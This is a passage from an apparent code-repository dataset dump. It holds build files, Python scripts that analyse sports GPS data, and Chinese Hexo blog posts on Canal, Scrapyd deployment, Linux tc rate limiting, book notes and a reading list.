src/depth_stream_stabilizer.o\"\n\t@echo \"... src/depth_stream_stabilizer.i\"\n\t@echo \"... src/depth_stream_stabilizer.s\"\n\t@echo \"... src/predictive_director.o\"\n\t@echo \"... src/predictive_director.i\"\n\t@echo \"... src/predictive_director.s\"\n.PHONY : help\n\n\n\n#=============================================================================\n# Special targets to cleanup operation of make.\n\n# Special rule to run CMake to check the build system integrity.\n# No rule that depends on this can have commands that come from listfiles\n# because they might be regenerated.\ncmake_check_build_system:\n\tcd /home/will/catkin_ws/build && $(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 0\n.PHONY : cmake_check_build_system\n\n"
},
{
"alpha_fraction": 0.7666666507720947,
"alphanum_fraction": 0.7666666507720947,
"avg_line_length": 59,
"blob_id": "e5e62060bb68722a360a6af8a1e97b7778079390",
"content_id": "c489fb1a93722e1a0474da71c36ab8751bce4ab9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 120,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 2,
"path": "/build/basic_teleop/catkin_generated/basic_teleop-msg-extras.cmake.develspace.in",
"repo_name": "DoubleWB/old_ros",
"src_encoding": "UTF-8",
"text": "set(basic_teleop_MESSAGE_FILES \"/home/will/catkin_ws/src/basic_teleop/msg/Move.msg\")\nset(basic_teleop_SERVICE_FILES \"\")\n"
}
] | 22 |
magickaiyang/archive | https://github.com/magickaiyang/archive | 9eb5c7d82a71aa0eeb10829c26e8cd5a91e6bfc9 | 594e18a53b97c3b3bd422450a9d6903f6f33b9c2 | 81082d9d3f1a033d3af26a63f45c96091502e81e | refs/heads/master | 2020-06-28T17:23:38.039043 | 2019-08-02T21:07:18 | 2019-08-02T21:07:18 | 200,295,713 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.45500847697257996,
"alphanum_fraction": 0.4745331108570099,
"avg_line_length": 33.64706039428711,
"blob_id": "867405ee79e1fd92b0cb07870bf3fa968fcfe41c",
"content_id": "1cee90d276cbafd52ec1dad19ef7c586fcf99ddc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1178,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 34,
"path": "/datafest/intense_event.py",
"repo_name": "magickaiyang/archive",
"src_encoding": "UTF-8",
"text": "import pandas as pd\n\n\ndef build(gps, game_id):\n players = []\n\n for i in gps.PlayerID.unique():\n counter = 0\n prev_a = 0.0\n\n for j in range(1, 3):\n for k in gps[(gps.PlayerID == i) & (gps.Half == j)].FrameID.values: # first half second half\n ax = list(gps[(gps.PlayerID == i) & (gps.FrameID == k) & (gps.Half == j)].AccelX)[0]\n ay = list(gps[(gps.PlayerID == i) & (gps.FrameID == k) & (gps.Half == j)].AccelY)[0]\n az = list(gps[(gps.PlayerID == i) & (gps.FrameID == k) & (gps.Half == j)].AccelZ)[0]\n a = ax ** 2 + ay ** 2 + az ** 2\n\n if (prev_a > 5.0 and a < 5.0) or (prev_a < 5.0 and a > 5.0):\n counter += 1\n prev_a = a\n\n players.append({'GameID': game_id, 'PlayerID': i, 'IntenseEvents': counter})\n\n return players\n\n\nif __name__ == '__main__':\n df = pd.read_csv('gps.csv')\n for i in df.GameID.unique():\n if i > 3:\n print('game{0}.csv'.format(i))\n game_df = df[df.GameID == i]\n count_df = pd.DataFrame(build(game_df, i))\n count_df.to_csv('game{0}.csv'.format(i))\n"
},
{
"alpha_fraction": 0.6610360145568848,
"alphanum_fraction": 0.7027027010917664,
"avg_line_length": 34.52000045776367,
"blob_id": "e0e4b559d4be841a113114a461615116f66210a9",
"content_id": "8ec418ca4df4be9bb095531cc8d5a0f61822f360",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 888,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 25,
"path": "/datafest/plot.py",
"repo_name": "magickaiyang/archive",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\n\n# Create new Figure and an Axes which fills it.\nfig = plt.figure(figsize=(27, 27))\nax = fig.add_axes([0, 0, 1, 1], frameon=False)\nax.margins(x=-0.001, y=-0.001)\n\ngps = pd.read_csv('gps_filtered.csv').sort_values(by='PlayerID')\n# gps = gps[gps.Half == 1]\n\nscat = ax.scatter(gps[gps.FrameID == 1]['Longitude'], gps[gps.FrameID == 1]['Latitude'], s=150, color='red', alpha=0.5)\n\n\ndef update(frame_number):\n # print(frame_number)\n # Update the scatter collection, with the new positions\n scat.set_offsets(gps[gps.FrameID == frame_number][['Longitude', 'Latitude']])\n\n\n# Construct the animation, using the update function as the animation director.\nani = animation = FuncAnimation(fig, update, interval=50, save_count=5000) # 0.1s\nani.save('game_viz.mp4', bitrate=1000)\n# plt.show()\n"
}
] | 2 |
polarisary/hexoblog | https://github.com/polarisary/hexoblog | 3eb2e96565821574432eaacb49caa07e07b9e643 | bddc2a139235fe26d808c82c3f22c2b02641e155 | 47488861a2b895767e7015f707515aa770df8d03 | refs/heads/master | 2023-03-05T01:37:35.366294 | 2019-07-28T14:06:43 | 2019-07-28T14:06:43 | 118,543,760 | 0 | 0 | null | 2018-01-23T02:09:25 | 2019-07-28T14:07:10 | 2022-12-06T20:21:34 | CSS | [
{
"alpha_fraction": 0.42794761061668396,
"alphanum_fraction": 0.6215429306030273,
"avg_line_length": 9.584615707397461,
"blob_id": "705df7c6bd4c2c60c473ee1ee6c3dbf2fd2949e4",
"content_id": "5aa91788e4cdb4630cf95df72563816b190254ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1259,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 65,
"path": "/source/about/index.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: 关于读书\ndate: 2018-06-09 21:34:24\ncomments: false\n---\n\n### 在读书目\n\n- 技术\n\n\t> 《极客时间 - 技术领导力300讲》\n >\n > 《Java核心技术 第10版 卷I》\n\n- 研究项目\n\n\t> Alibaba - Canal\n\n- 非技术\n\n\t> 《思考,快与慢》\n\t>\n\t> 《清醒思考的艺术》\n\t>\n\t> 《叛逆不是孩子的错》\n\t>\n\t> 《股市真规则》\n\n### 已读书目\n\n《图灵程序设计丛书:图解HTTP》 2018.1\n\n《异类-用软实力思维解决人生发展问题》 2018.2~2018.3\n\n《极客时间 - 邱岳的产品手记》 2018.3\n\n《极客时间 - 朱赟的技术管理课》 2018.4\n\n《极客时间 - 从0开始学架构》 2018.4~2018.8\n\n《见识:商业的本质和人生的智慧》 2018.5\n\n《增长黑客》 2018.5~2018.6\n\n《绝对自控》 2018.6\n\n《软技能:代码之外的生存指南》 2018.3~2018.7\n\n《libevent深入浅出》 2018.7\n\n《练习的心态:如何培养耐心、专注和自律》 2018.7\n\n《异类:不一样的成功启示录》 2018.8\n\n《MySQL技术内幕-InnoDB存储引擎-第二版》 2018.10\n\n《极客时间 - 左耳听风》 2019.3\n\n《极客时间 - 技术管理实战36讲》 2019.4\n\n《技术管理之巅》 2019.5\n\n《富爸爸穷爸爸》 2019.5\n\n《小狗钱钱》 2019.6"
},
{
"alpha_fraction": 0.7851083874702454,
"alphanum_fraction": 0.806786060333252,
"avg_line_length": 26.947368621826172,
"blob_id": "560c21e7486acee8ceaa46b877e586abf46ec53c",
"content_id": "9c6e32c6161a342fbebe7ee4700757126c08a1f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1883,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 38,
"path": "/source/_posts/canal-01.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: Canal系列01-整体介绍\ndate: 2019-05-16 18:29:58\ncategories: Canal系列\ntags: [canal]\n---\n\n## 一、项目定位及应用场景\nCanal是使用java开发的基于数据库增量日志解析,提供增量数据订阅&消费,目前主要支持mysql。目前我们主要使用Canal接收MySQL的binlog,从而构建数据库中数据的变更历史,供业务方使用。\n\n## 二、工作原理\n\n- 1)canal模拟mysql slave的交互协议,伪装自己为mysql slave,向mysql master发送dump协议\n- 2)mysql master收到dump请求,开始推送binary log给slave(也就是canal)\n- 3)canal解析binary log对象(原始为byte流)\n\n## 三、架构\n\n其中server代表一个canal运行实例,对应于一个jvm,instance对应于一个数据通道 (1个server对应1..n个instance)\ninstance模块:\n- eventParser (数据源接入,模拟slave协议和master进行交互,协议解析)\n- eventSink (Parser和Store链接器,进行数据过滤,加工,分发的工作)\n- eventStore (数据存储)\n- metaManager (增量订阅&消费信息管理器)\n\n## 四、源码结构\n\nCanal的源代码如架构图中所示,分为server、parse、sink、store、meta、protocol等\n- server主要提供Http服务,client通过Http与server交互\n- instance代表一个数据通道,包括:\n - parse模块,主要负责解析master推送的binlog\n - sink模块,对解析后的binlog进行过滤,路由分发、归并、加工等\n - store模块,主要为sink加工后的数据提供存储\n - meta模块,提供instance级别的消费位点持久化\n\nprotocol模块,提供数据库相关协议支持,目前主要是MySQL\nprometheus模块,主要提供对Canal的监控\ndeployer模块是Canal的主模块,提供打包部署,启动等等"
},
{
"alpha_fraction": 0.7497879266738892,
"alphanum_fraction": 0.7705682516098022,
"avg_line_length": 23.30927848815918,
"blob_id": "1c5066871f019e2fcdd45e98b1020e719d577d52",
"content_id": "c2d6a61033928720a1d064f957c7f4f39e751c2b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3282,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 97,
"path": "/source/_posts/scrapyd-deploy.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: 使用Scrapyd部署爬虫\ndate: 2018-05-30 22:56:17\ncategories: 爬虫\ntags: [Spider, Scrapy, Scrapyd]\n---\n\n### 一、概念\nScrapyd是可以运行Scrapy爬虫的服务,允许我们部署Scrapy项目并且可以使用Http来控制爬虫。Scrapyd能够管理多个项目,并且每个项目可以有多个版本,但只有最新的版本才是有效的。\nScrapyd-client是Scrapyd的客户端,主要提供一种部署Scrapy项目到Scrapyd服务端的工具。\n\n### 二、部署方式\n开发环境部署Scrapyd-client\n```\npip install scrapyd-client\n```\n线上服务器部署Scrapyd\n```\npip install scrapyd\n```\n\n### 三、配置\nScrapyd安装完成后,在/etc/scrapyd目录下,生成配置文件scrapyd.conf,内容如下:\n\n```\n[scrapyd]\neggs_dir = eggs\nlogs_dir = logs\nitems_dir =\njobs_to_keep = 5\ndbs_dir = dbs\nmax_proc = 0\nmax_proc_per_cpu = 4\nfinished_to_keep = 100\npoll_interval = 5.0\nbind_address = 127.0.0.1\nhttp_port = 6800\ndebug = off\nrunner = scrapyd.runner\napplication = scrapyd.app.application\nlauncher = scrapyd.launcher.Launcher\nwebroot = scrapyd.website.Root\n\n[services]\nschedule.json = scrapyd.webservice.Schedule\ncancel.json = scrapyd.webservice.Cancel\naddversion.json = scrapyd.webservice.AddVersion\nlistprojects.json = scrapyd.webservice.ListProjects\nlistversions.json = scrapyd.webservice.ListVersions\nlistspiders.json = scrapyd.webservice.ListSpiders\ndelproject.json = scrapyd.webservice.DeleteProject\ndelversion.json = scrapyd.webservice.DeleteVersion\nlistjobs.json = scrapyd.webservice.ListJobs\ndaemonstatus.json = scrapyd.webservice.DaemonStatus\n\n```\n\n其中bind_address默认监听本地连接,可以修改成0.0.0.0在公网上访问,默认端口6800.\n### 四、启动Scrapyd:\n\n```\nnohup scrapyd &\n```\n之后就可以使用公网ip:6800访问了,这个是Scrapyd提供的一个简单监控页面。可通过此页面查看Spider、Log等相关信息。\n\n### 五、发布Spider\n开发环境安装好Scrapyd-client后,就可以将开发好的Spider发布上线了。\n首先需要将Scrapy项目中的scrapy.cfg修改下:\n\n```\n[deploy:xxx]\nurl = http://localhost:6800/\nproject = xxx\n```\n其中deploy:xxx代表Scrapyd服务端名称(可随意填写),url代表Scrapyd服务地址,project=xxx代表Scrapy项目名称\n可以使用scrapyd-deploy -l检查配置是否正确,接下来关键的时候到了。\n\n```\nscrapyd-deploy <target> -p <project> --version <version>\n```\n\n将Spider打包发布到Scrapyd服务上,其中<target>与上面配置中deploy对应,<project>同样与上面project对应,<version>指定一个相应的版本号,如果发布成功的话,会有提示说明。\n\n### 六、启动Spider\nSpider发布到Scrapyd服务端后,就可以在任何地方启动Spider的了,执行下面命令启动相应Spider:\n\n```\ncurl http://ip:port/schedule.json -d project=project_name -d spider=spider-name\n```\n\n其中ip:port是Scrapyd服务地址,project_name是要启动的Spider所在项目名称,spider-name是要启动的Spider的名称。\n### 七、停掉Spider\n\n```\ncurl http://ip:port/cancel.json -d project=project-name -d job=jobid\n```\n其中jobid是要停止的Spider的jobid,可以在Scrapyd控制查看到\n"
},
{
"alpha_fraction": 0.7807474732398987,
"alphanum_fraction": 0.7837896347045898,
"avg_line_length": 22.014999389648438,
"blob_id": "2288849a10128c44da35f8a8c3f3047b74bda36f",
"content_id": "0b4352e77fe892b1dc3f1c13dda021d045680a1d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 12592,
"license_type": "no_license",
"max_line_length": 162,
"num_lines": 200,
"path": "/source/_posts/zikong.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: 《绝对自控》读书笔记\ndate: 2018-07-05 22:46:17\ncategories: 读书 #文章文类\ntags: [读书] #文章标签,多于一项时用这种格式\n---\n上周读完了美国作家瑞安·霍利迪的《绝对自控》,读完最深刻的就是书中描述“自我”对个人成长、发展的不容忽视的影响。\n求索路上,严控自我;要谦逊、勤勉、自省,从自我中脱离出来,懂得自我批判,知道自我激励,在个人成长的过程中如何处理“自我”,与自己很好的相处。生活不是为了和其他人较劲,意义不在于拥有的比别人更多。生活是做自己,做到极致,不为正轨之外的任何事情而妥协。生活是到达你想到达的彼岸,完成你想完成的最好。仅此而已,不多一点也不少一点。\n\n下面是读书过程的记录的要点:\n\n## 第一部分:求索\n\n### 求索路上,严控自我\n\n> 求索时不急不躁,成功时保持谦虚,失败时得以复原 \n\n> ** 思考的过程一定要慢,行动的开始一定要快 **\n\n> 在“渴望”这个阶段,你必须站在稍远的地方好好看清自己,从自我中脱离出来,谦逊、勤勉和自省。\n\n> 目标要大,但行动要细;看重未来,但活在当下;以行动和求知作为焦点,抛却对地位和他人认可的关注,如此,则野心不再是浮夸的面具,而成为源源不绝的、可再生的动力。一步接一步,学习、成长;不着急,慢慢来。\n\n### 成名还是成事\n\n> 你所做的每件事都会反过来作用于你。\n\n> 如果你的目标大于自我——渴望有所成就,或向自己做出证明——那一切都会瞬间变得既单纯又复杂。单纯在于,你清楚了心之所向,明白什么才是真正重要的事情。\n\n> 我要成就怎样的人生,流连在声名中,何谈成就事业\n\n### 做一名学生\n\n> 所谓百年树人,绝非拔苗助长可实现;既然不能一蹴而就,便只好日复一日辛勤耕耘。如果不按这个方法来,那就只能被逐出师门了。\n\n> 不懂装懂是最危险的一项恶习,凡是沾染上的人都无法企及更好的境界。对此,不断学习和认清自我就是一剂治愈的苦药。\n\n> 像苏格拉底一样自省,承认自己所知甚少。把所在领域的根基消化为己有,连并一切围绕基础而延伸的最新发展,不僵于空间,不困于时间。活到老,学到老。我们就是自己的老师、教练、评论家。\n\n> 好的学生应该像一块海绵,吸收、渗透、抓住身边的所有水分。懂得自我批判,知道自我激励,从不停止学习和思考,能从一个主题跨越到另一个主题,从一个挑战走向另一个挑战。真正的学生就该做自己的老师,批判自身的不足。等到一人身担多职,才发现哪还有空闲的角色分给“自我”?\n\n> 让人惊讶的是,野心十足的大人物反而都为人谦虚。他们尽管自信满满,却一直以学生的身份自居,谦虚而不骄纵。\n\n### 少一点热爱\n\n> 人生哲学是保持掌控,脚踏实地,绝不做“冲动的奴隶”。目标是一个“去自我化”的过程,是超越自我向更高的层次追逐。\n\n> 热爱是形式大于功能。而目标则只关乎功能、功能、功能。\n\n### 画布策略\n\n> 重点并不在于一直给别人铺路,而是要适当支持,助人一臂之力。\n\n> 要像一块海绵一样,吸收身边所有养分,听取所有意见。\n\n> 权力与地位(自我的附属品)简直不费吹灰之力就能毁掉一个大有前途的人。\n\n> 伟大产生于谦逊卑微,来自枯燥乏味的工作。真正成功以前,你永远都是房间里那个最不重要的人,看轻自己,看重工作\n\n> 想想怎么给每个遇到的人添一把力,想想能为别人做点什么。尽管从中得利的人是他们而不是你,但经过日积月累,影响仍不容小觑:你将学会解决各种问题的途径,成为办公室里不可或缺的角色;培养新的关系,为将来可能遇见的难题准备好人际资源。这就是画布策略的精明所在——欲自助,先助人,以短期利益交换长期回报。\n\n> 咬紧牙关,告诉自己每一秒没有花在工作上的时间都是一种浪费,迟早有一天自己可以出人头地,不再看别人脸色?其实啊,等你克服了以上这些冲动情绪后,自然就知道该如何执行策略了。\n\n### 束缚自己\n\n> ** 我所谓的骨气,就是忍 **\n\n> 做不会被自我耽误远大前程的人。小不忍则乱大谋,他心里清楚,有许多股力量试图击败他,摧毁他。可想实现的目标、想完成的任务都明明白白地摆在眼前呢,此刻的忍耐是有价值的。他本不必这样苛求自己,但他确实这样做了。\n\n> ** 自我的征服者都明白一个道理:轻视别人正是羞辱自己。**\n\n> ** 相反,在这个关头,我们什么都不该做。接受他人的冷漠、轻视、鄙夷,把它们囫囵吞下,直吞到恶心反胃为止 **\n\n> 转身继续你的工作,屏蔽所有嘈杂的声音,万万不要让它们影响到你。克制很难,但是必须克制。就算遭遇挑衅又如何?谁也不可能一直忍下去,但此刻我们必须咬紧牙关。\n\n> 成功以前不仅不能妄想改变世界的规则,还要找寻途径让自己的目标契合于这个世界——即使目标不过是多花些时间提升自我,向他人学习并塑造、巩固自身基础。\n\n> 罗宾森也会冲动,也像我们普通人一样会发火,会沮丧。只是他知道自己脚下的这条钢索只容得下克制,容不下自我。\n\n### 摆脱自己\n\n> ** 向生活妥协,尽情享受吧!**\n\n> 你的世界里没有什么观众,有的只是等待完成的工作和预备学习的经验而已。\n\n### 警惕:早产的骄傲\n\n> 年轻的约翰·洛克菲勒养成了每晚跟自己对话的习惯。“你不过是刚刚起步,千万别把自己当成什么了不起的大老板。多看看周围的世界,不要迷失自己!每一步都得踏实地走。”\n\n> 接受反馈、保持饥饿、适当地规划生活\n\n> “自我认识的首要产物便是谦逊。”要想对抗自我,靠的就是真正了解自我。\n\n> ** 现在的我是不是忽视了一些本该看到的东西?我在歇斯底里、暴躁狂怒的同时是不是也在逃避些什么?”此时正是扪心自问的最好时机,因为你需要付出的代价还远远算不上高昂。**\n\n> ** 沉默并不代表不骄傲。** “你所引以为傲的就是你最危险的软肋。不管什么时候,都不要骄傲,不要吹嘘。\n\n### 拼、拼、拼\n\n> 请记住,拼、拼、拼,永远地拼命做下去吧。\n\n> **只要记得,眼前还有很长很长的路就足够了,成功靠的从来都不是智慧,而是持之以恒的努力。**\n\n> **没有实现不了的梦想——只要我们耐住性子,戒骄戒躁,只要我们还有孤注一掷的勇气。**\n\n> 工作的意义就在于别人因疾风骤雨闭门不出时,你却依然跋涉;别人在赶制初稿模型的乏味中退缩,你却依然坚持;别人在欢呼赞美中放慢脚步,你却依然加速。你不需要做到最好,因为你注定会做到最好。\n\n### 不管未来几何,严控自我\n\n> **培养一些积极健康的习惯,也许会一生受益。**\n\n> **真正的野心是满怀自信地面对生活,对一切阻碍视而不见。这注定是场孤独的战役,因为你要削弱锋芒,要“成为最好的自己,一战到底,不管局势如何演变”。这些绝不仅仅是响亮的口号。要记住,成事,而非成名。** \n\n> 这场考验来得悄无声息又严酷无比,他在其中练就刚毅而坚韧的性格,**创新却不仓促,勇敢却不鲁莽。这才是真正的领导者。**\n\n## 第二部分:成功\n\n### 无论成就如何,依然严控自我\n\n> **不具备美德、不经过训练的人“难以承受好运的嘉赏”**\n\n> 对一位公司总裁伤害最大的并不是人们常说的酒精成瘾,而是自我。\n\n> 成功有毒,与之周旋必须保持清醒。\n\n### 以学生的姿态\n\n> 通常情况下,我们自恃其才,情愿蜷在舒适区内,以自知之明自我满足(从不质疑自己,也没想过继续学习)\n\n### 别给自己讲故事\n\n> 从不陷入幻想的圈套。\n\n> **满怀渴望时,绝不试图从他人经验中复制成功;目标实现时,绝不佯装一切事情都尽在掌控。**根本没有什么伟大的传说。一路走来的人是你,你心里清楚都发生过什么。\n\n> **不求一旦浮爵,不忘立身之本。**\n\n### 你看重什么\n\n> ** 知道自己想要什么是智慧和成熟的开始。**\n\n> 自我引起嫉妒,嫉妒是骨中的朽烂。自我欺人瞒己,丰功伟业也渐渐溃于蚁穴。\n\n> **生活不是为了和其他人较劲,意义不在于拥有的比别人更多。生活是做自己,做到极致,不为正轨之外的任何事情而妥协。生活是到达你想到达的彼岸,完成你想完成的最好。仅此而已,不多一点也不少一点。**\n\n> 
是时候坐下想想在这大千世界里,你最看重什么。随后抛下剩余,只为它乘风破浪。没有它,成功也来得不愉悦、不完整,甚至不长久。\n\n> **生活是妥协,而自我是放肆。**\n\n> **大声拒绝在不属于自己的赛场竞技,才能无视那些所谓“成功人士”,因为他们的成功——至少大多数情况下——与你无关,甚至与他们自己都无关;才能心如止水,像塞涅卡说的那样知道自己从何而来,去向何处。**\n\n> 其实人人都会陷入一种错觉之中,仿佛只有自己得到一些其他人都有的东西时才能真正感到幸福。想要意识到这种错觉不过是虚无缥缈就必须历经几次遍体鳞伤。偶尔,我们发现自己被逼到了无名之地,甚至说不出背后原因几何。这时及时悬崖勒马也是一种勇气的表现。\n\n> 想清楚你为何追逐,再想清楚你在追逐什么。\n\n> 忽略所有打乱步伐的干扰,让他人因你的所有而垂涎。这才是真正的独立。\n\n### 权力、控制、偏执\n\n> **如果你医不好自己这把坏脾气,那离发疯失控也就不远了。**也许正是因为富兰克林很会控制自己的愤怒吧,他觉得写下这封信已经足够了,直到最后也没有把信寄出去。\n\n> **所谓同情,就是当你看着一个低能儿企图欺负别人,却最后只伤了自己。**\n\n> 他蔑视这个国家,却也正需要从中得到掌声和支持。”法国人民在他眼里不过是任人摆弄、低人一等的傀儡,所有不能无条件支持他的人,便都是叛徒。\n\n> 一个明智的人要时常以能力有限、权责有度来自省。\n\n> **凡事都想争第一的心态形成可悲的反馈回路,让其他人得此机会伤害、打击我们。旁观者反倒能看透这种心态:一张虚伪、混乱和不安全感的面具罢了。**\n\n### 管好自己\n\n> **当你成为行业内最成功的人后,肩负的责任也有所改变。要做的越来越少,要想的却越来越多。这就是领导力的本质。**\n\n> **如果你忙于扮演“大佬”的角色而眼光不能放远,谁又能替你高瞻远瞩呢?**\n\n> 重要的是,在工作把你生吞活剥之前抓紧时间学习如何管理自己和他人。那些事无巨细的管理者往往都被自我占了上风,很快就要迎接压倒骆驼的最后一根稻草。\n\n### 警惕“恋我癖”\n\n> 自我需要荣誉来正名;自信却有耐心等待,不在乎外界认同,只专注于手上的工作。\n\n### 冥想无限\n\n> 一沙一世界,一花一天堂。掌中握无限,刹那是永劫。\n\n### 不管未来几何,严控自我\n\n> 没有一条路可以绕开挫折,该来的迟早都会降临。\n\n> 不管前路几何,自我都是敌人。自我让人步履维艰,让失败的阴云久久不散。\n\n> 不让自我与成功相伴;用力推开眼前的阴云,逃脱自我的纠葛。\n\n## 后记\n\n> 正面对峙自我不是件容易的差事。首先,要承认自我的存在。然后,迫使它接受审视和批评。\n\n> 任何情况下,只要下定了决心,本身就已经是对失败的一记重击。只有决心当然不够,但这是一个很好的开始。\n\n> **学着打磨心性,压制内心的冲动——不仅是为人体面的道德要求,还会让你变得更出色,陪你渡过欲望苦海中的大风大浪。**"
},
{
"alpha_fraction": 0.6363636255264282,
"alphanum_fraction": 0.7361853718757629,
"avg_line_length": 10.239999771118164,
"blob_id": "46791c263c989aa9e39d4ee32b69b81e62083624",
"content_id": "b86823db905bfc9bfcc780c9b0a4038199cc97b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1249,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 50,
"path": "/source/_posts/2017年度总结.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: 2017年度总结\ndate: 2018-01-02 15:12:50\ncategories: 总结\ntags: [2017]\n---\n\n春去秋来,一年很快就过去了。在过去的2017年,自己经历了一些成长的烦恼,同时也开始重新审视和思考自己;\n\n### 一、工作\n\n工作上最大的变化就是从视频工具到用户工具的转变,从2016年7或8月份开始接触、学习使用Unity到2017年4月份,大半年时间的学习和使用。接下来的大半年时间都是在做用户工具相关的产品。\n\n今年大部分时间都是在用户工具上,主要技术增长上是chrome extension开发;\n\n### 二、生活\n\n很庆幸有一个可爱的孩子,现在逐渐可以走路了,咿咿呀呀说些话。\n\n每天下班回家看到他睡觉的样子,觉得自己再辛苦也是值得的。\n\n一个人在家带孩纸真是挺累的,辛苦老婆了!\n\n### 2018年规划\n\n** 习惯培养: **\n\n1)以前的学习工作等等缺少总结思考,2018年做好总结。\n\n2)写博客,每月>=1篇。\n\n3)用好笔记\n\n** 个人学习: **\n\n1)MySql\n\n2)UNIX环境高级编程\n\n3)架构及未来 [在读]\n\n4)知识管理方面\n\n5)产品方面 [极客时间:邱岳]\n\n** 生活: **\n\n1)情绪控制\n\n2)带家人旅行"
},
{
"alpha_fraction": 0.6687023043632507,
"alphanum_fraction": 0.7603053450584412,
"avg_line_length": 29.6875,
"blob_id": "46e1c9bdea2e00a588393ddb189657528ee666fa",
"content_id": "89104341a1dd72265296ac5aeabedb2ff65a800d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3387,
"license_type": "no_license",
"max_line_length": 171,
"num_lines": 64,
"path": "/source/_posts/tc.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\nlayout: linux\ntitle: Linux TC限流\ndate: 2018-03-27 21:52:15\ncategories: Linux\ntags: [Linux,TC,QOS]\n---\n流量控制的一个基本概念是队列(Qdisc),每个网卡都与一个队列(Qdisc)相联系, 每当内核需要将报文分组从网卡发送出去, 都会首先将该报文分组添加到该网卡所配置的队列中, 由该队列决定报文分组的发送顺序。因此可以说,所有的流量控制都发生在队列中.\n\n在Linux中,流量控制都是通过TC这个工具来完成的。通常, 要对网卡进行流量控制的配置,需要进行如下的步骤:\n- 为网卡配置一个队列;\n- 在该队列上建立分类;\n- 根据需要建立子队列和子分类;\n- 为每个分类建立过滤器。\n\nLinux TC中的队列有CBQ、HTB等,CBQ 比较复杂,不容易理解。HTB(HierarchicaIToken Bucket)是一个可分类的队列, 与其他复杂的队列类型相比,HTB具有功能强大、配置简单及容易上手等优点。\n\n### 一、创建队列\n```\ntc qdisc add dev eth0 root handle 1: htb default 11\n\n”dev eth0 表示要操作的网卡为eth0。\n”root 表示为网卡eth0添加的是一个根队列。\n”handle 1: 表示队列的句柄为1:。\n”htb 表示要添加的队列为HTB队列。\n”default 11 是htb特有的队列参数,意思是所有未分类的流量都将分配给类别1:11。\n```\n### 二、创建分类\n```\ntc class add dev eth0 parent 1: classid 1:1 htb rate 40mbit ceil 40mbit\ntc class add dev eth0 parent 1: classid 1:12 htb rate 10mbit ceil 10mbit\n\n”parent 1:”表示类别的父亲为根队列1:。\n”classid1:11″表示创建一个标识为1:11的类别,\n”rate 40mbit”表示系统将为该类别确保带宽40mbit,\n”ceil 40mbit”,表示该类别的最高可占用带宽为40mbit。\n”burst 40mbit”,表示该类别的峰值可占用带宽为40mbit。\n```\n### 三、设置过滤器\n```\ntc filter add dev eth0 protocol ip parent 1:0 prio 1 u32 match ip dport 80 0xffff flowid 1:11\ntc filter add dev eth0 prtocol ip parent 1:0 prio 1 u32 match ip dport 25 0xffff flowid 1:12\n\n”protocol ip”表示该过滤器应该检查报文分组的协议字段。\n”prio 1″ 表示它们对报文处理的优先级是相同的,对于不同优先级的过滤器, 系统将按照从小到大的优先级。顺序来执行过滤器, 对于相同的优先级,系统将按照命令的先后顺序执行。这几个过滤器还用到了u32选择器(命令中u32后面的部分)来匹配不同的数据流。以第一个命令为例,判断的是dport字段,如果该字段与Oxffff进行与操作的结果是80\n”flowid 1:11″ 表示将把该数据流分配给类别1:1 1。\n```\n### 四、配合iptables\nTC作用:建立数据通道, 建立的通道有数据包管理方式, 通道的优先级, 通道的速率(这就是限速)\niptables作用:决定哪个ip 或者 mac 或者某个应用, 走哪个通道.\n\n### 五、示例\n限制网卡eth0 10Mbps\n```\ntc qdisc add dev eth0 root tbf rate 10mbit burst 10kb lat 400.0ms\ntc -s qdisc ls dev eth0\n```\n\n六、参考\n[Linux tc QOS 详解][1]\n[Linux 流量控制实施指南][2]\n\n[1]: http://www.wy182000.com/2013/04/15/linux-tc-%E8%AF%A6%E8%A7%A3/ \"Linux tc QOS 详解\" \n[2]: http://www.wy182000.com/2013/04/17/linux-%E6%B5%81%E9%87%8F%E6%8E%A7%E5%88%B6%E5%AE%9E%E6%96%BD%E6%8C%87%E5%8D%97/\t\"Linux 流量控制实施指南\" \n"
},
{
"alpha_fraction": 0.8243727684020996,
"alphanum_fraction": 0.8401433825492859,
"avg_line_length": 24.381818771362305,
"blob_id": "24f8103c1c3c1e028ad6f253ce302f41ae1c52ea",
"content_id": "398f5433ceb29b42764fe0ef91bc6a172a84e1da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3499,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 55,
"path": "/source/_posts/msyql-index.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
